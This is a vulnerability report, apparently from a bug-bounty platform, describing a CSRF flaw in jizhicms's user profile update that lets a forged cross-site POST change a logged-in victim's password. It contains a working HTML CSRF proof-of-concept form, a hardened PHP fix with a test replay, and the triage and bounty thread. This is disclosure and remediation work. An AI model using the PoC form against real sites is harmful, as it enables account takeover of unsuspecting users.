CSRF vulnerability exists in modifying user information (including password) in cherry-toto/jizhicms

Valid

Reported on

Jul 30th 2022


Description

CSRF vulnerability in the user information modification page: the form that updates profile fields (including the password) accepts a forged cross-site POST.

Proof of Concept

In `\app\home\c\UserController` (the handler behind `/user/userinfo.html`), the POSTed fields are written straight to the member row and merged into the session; there is no anti-CSRF token check before the update:

```php
// Write the submitted fields ($w) to the current member's row
$re = M('member')->update(['id'=>$this->member['id']],$w);
// Reload the row and refresh the session copy (minus the password hash)
$member = M('member')->find(['id'=>$this->member['id']]);
unset($member['pass']);
$_SESSION['member'] = array_merge($_SESSION['member'],$member);
if($this->frparam('ajax')){
    JsonReturn(['code'=>0,'msg'=>JZLANG('Modified successfully!')]);
}
Error(JZLANG('Modified successfully!'));
```
PoC.html (CSRF form generated by Burp Suite Professional; it submits the same fields the profile form sends, including the new password, with no token):

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/user/userinfo.html" method="POST">
      <input type="hidden" name="username" value="rA5OOQ" />
      <input type="hidden" name="sex" value="0" />
      <input type="hidden" name="litpic" value="" />
      <input type="hidden" name="file&#95;litpic" value="" />
      <input type="hidden" name="tel" value="111111111111" />
      <input type="hidden" name="email" value="111111123" />
      <input type="hidden" name="province" value="" />
      <input type="hidden" name="city" value="" />
      <input type="hidden" name="address" value="" />
      <input type="hidden" name="signature" value="" />
      <input type="hidden" name="birthday" value="" />
      <input type="hidden" name="password" value="" />
      <input type="hidden" name="repassword" value="" />
      <input type="hidden" name="invite" value="http&#58;&#47;&#47;localhost&#47;login&#47;register&#46;html&#63;invite&#61;1" />
      <input type="hidden" name="submit" value="�&#143;&#144;&#164;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

# Impact

On the user information modification page, a single request is enough to change the password and the other profile fields; the handler performs no further verification (no anti-CSRF token, and no check of the current password before a new one is stored). An attacker can therefore host a page like the PoC above and, once a logged-in user is induced to open it, overwrite the victim's password and other personal information.
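To make the fix concrete, the following is an added example (not code from the jizhicms project): a standalone handler in the vulnerable shape shown above beside a hardened version that binds a per-session token into the form, checks fetch metadata / Origin, and re-authenticates with the current password before it can be replaced. `save_member()`, `collect_fields()`, the field list and the `http://localhost` site origin are assumptions standing in for `M('member')->update(...)` and the real controller.

```php
<?php
// Added example, not jizhicms code. save_member() is a placeholder for the ORM write.
declare(strict_types=1);

function save_member(int $id, array $w): bool
{
    // Placeholder: the real project writes $w to the member row here.
    return $id > 0 && $w !== [];
}

function collect_fields(array $post): array
{
    $w = [];
    foreach (['username', 'sex', 'tel', 'email', 'address', 'signature'] as $f) {
        if (isset($post[$f])) {
            $w[$f] = (string)$post[$f];
        }
    }
    if (($post['password'] ?? '') !== '') {
        if ($post['password'] !== ($post['repassword'] ?? '')) {
            throw new InvalidArgumentException('passwords differ');
        }
        $w['pass'] = password_hash((string)$post['password'], PASSWORD_DEFAULT);
    }
    return $w;
}

// Vulnerable shape: the only thing authorising the write is the session cookie,
// which the browser also attaches to a form POST coming from another site.
function update_profile_vulnerable(array $post, array $session): bool
{
    return save_member((int)$session['member']['id'], collect_fields($post));
}

// Hardened version.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));   // unguessable, per session
    }
    return $session['csrf_token'];
}

// Rendered inside the profile form so a legitimate submission carries the token.
function csrf_hidden_input(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

function request_is_same_site(array $server, string $siteOrigin): bool
{
    $fetchSite = $server['HTTP_SEC_FETCH_SITE'] ?? null;
    if ($fetchSite !== null) {
        return $fetchSite === 'same-origin';          // modern browsers send this header
    }
    // Fallback: require an Origin header matching our own origin.
    return isset($server['HTTP_ORIGIN'])
        && strcasecmp($server['HTTP_ORIGIN'], $siteOrigin) === 0;
}

function update_profile_hardened(array $post, array $server, array &$session, string $storedHash): array
{
    if (!request_is_same_site($server, 'http://localhost')) {
        return ['code' => 1, 'msg' => 'cross-site request rejected'];
    }
    $sent     = (string)($post['csrf_token'] ?? '');
    $expected = (string)($session['csrf_token'] ?? '');
    if ($expected === '' || !hash_equals($expected, $sent)) {   // constant-time compare
        return ['code' => 1, 'msg' => 'missing or invalid CSRF token'];
    }
    if (($post['password'] ?? '') !== ''
        && !password_verify((string)($post['current_password'] ?? ''), $storedHash)) {
        return ['code' => 1, 'msg' => 'current password required to set a new one'];
    }
    $ok = save_member((int)$session['member']['id'], collect_fields($post));
    if ($ok && ($post['password'] ?? '') !== '') {
        unset($session['csrf_token']);               // rotate token after a credential change
        if (session_status() === PHP_SESSION_ACTIVE) {
            session_regenerate_id(true);
        }
    }
    return ['code' => $ok ? 0 : 1, 'msg' => $ok ? 'updated' : 'update failed'];
}

// Constructed replay of the PoC form above (no token, attacker Origin), then a
// legitimate same-origin submission carrying the token and current password.
if (PHP_SAPI === 'cli') {
    $session = ['member' => ['id' => 7]];
    $stored  = password_hash('victim-secret', PASSWORD_DEFAULT);
    $poc     = ['username' => 'rA5OOQ', 'email' => '111111123', 'password' => 'pwned', 'repassword' => 'pwned'];
    $evil    = ['HTTP_ORIGIN' => 'http://attacker.example', 'HTTP_SEC_FETCH_SITE' => 'cross-site'];
    var_dump(update_profile_vulnerable($poc, $session));
    var_dump(update_profile_hardened($poc, $evil, $session, $stored));

    $legit = $poc + ['csrf_token' => csrf_token($session), 'current_password' => 'victim-secret'];
    $same  = ['HTTP_ORIGIN' => 'http://localhost', 'HTTP_SEC_FETCH_SITE' => 'same-origin'];
    var_dump(update_profile_hardened($legit, $same, $session, $stored));
}
```

The token check alone closes the CSRF; the Origin / `Sec-Fetch-Site` check is defence in depth, and the current-password requirement limits what a session-riding attack (or a stolen session) can do to the account even if a token check is ever bypassed.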
We are processing your report and will contact the cherry-toto/jizhicms team within 24 hours. 2 months ago
We have contacted a member of the cherry-toto/jizhicms team and are waiting to hear back 2 months ago
留恋风 modified the Severity from Critical to Low 2 months ago
breakalegcml
2 months ago

Researcher


Hello, I don't agree with rating this CSRF as low severity. CSRF is generally medium severity, not to mention that this one can change all of the user's information; I would like to know why the severity of this CSRF should be changed to low?

留恋风 modified the Severity from Low to High (7.3) 2 months ago
breakalegcml
2 months ago

Researcher


Hello, thank you very much for changing the vulnerability severity. Could you please confirm this vulnerability and submit it?

We have sent a follow up to the cherry-toto/jizhicms team. We will try again in 7 days. 2 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
留恋风 validated this vulnerability 2 months ago
breakalegcml has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
留恋风 confirmed that a fix has been merged on 24893d 2 months ago
留恋风 has been awarded the fix bounty
breakalegcml
a month ago

Researcher


Hello, could you please apply for a CVE?